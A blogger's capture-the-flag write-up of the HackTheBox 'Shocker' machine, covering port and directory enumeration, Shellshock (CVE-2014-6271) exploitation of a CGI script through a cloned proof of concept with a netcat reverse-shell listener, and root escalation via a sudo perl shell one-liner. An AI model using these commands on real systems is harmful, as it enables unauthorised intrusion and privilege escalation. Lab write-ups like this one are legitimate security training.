Hack the box – Shocker (CVE-2014-6271)

Posted on By Sagahiko
HackTheBox, Machines

Enumeration

Scan the target machine with nmap.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web server and ssh are open.

Let’s check the web server first.

If we go to the page, we see the image file saying Don’t Bug me!

I couldn’t find any useful information on the web page and the source code.

There must be something we can discover from the web server.

Let’s enumerate directories.

I found /cgi-bin.

CGI stands for Common Gateway Interface.

CGI scripts interact with HTTP and HTML. CGI acts as a pathway for information sharing between a server and an application.

And cgi-bin is a storage for execution files for later use.

Ok, so execution files (CGI scripts) are stored in cgi-bin and used when requested by the web server.

You can check this article if interested.

Since I learned it stores execution files, I enumerate this directory to find execution files.

gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x sh,cgi

/user.sh

One file is spotted.

The content of the file is about Linux uptime. I don’t know how to exploit this file. So I googled cgi-bin exploits.

Then I found an interesting CVE: CVE-2014-6271 Shellshock

Also, there was a GitHub POC, therefore, I cloned it.

user flag

After cloning it, I executed the program.

python3 shellshock.py lhost lport http://10.10.10.56/cgi-bin/user.sh

Also, I set up the netcat for port listening.

nc -lvnp 8888                           
listening on [any] 8888 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 53876
whoami
shelly

It worked!

The flag for shelly is in the home directory.

root flag

Next, we need to escalate the privileges to get the root flag.

sudo -l

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

It says we can sudo /usr/bin/perl without a password.

You can launch a shell as root with the following command.

The command can be found on GTFObins.

sudo perl -e 'exec "/bin/sh";'

whoami
root

Ok, we are in as root!

The flag can be found in the root directory.

1

You may also like

Challenge
Hack the box: Wrong Spooky Season write up
HackTheBox
Heartbreaker-Continuum write-up
HackTheBox
Hack the box – machine – Sense
CTF
Pico CTF 2023 – Specialer writeup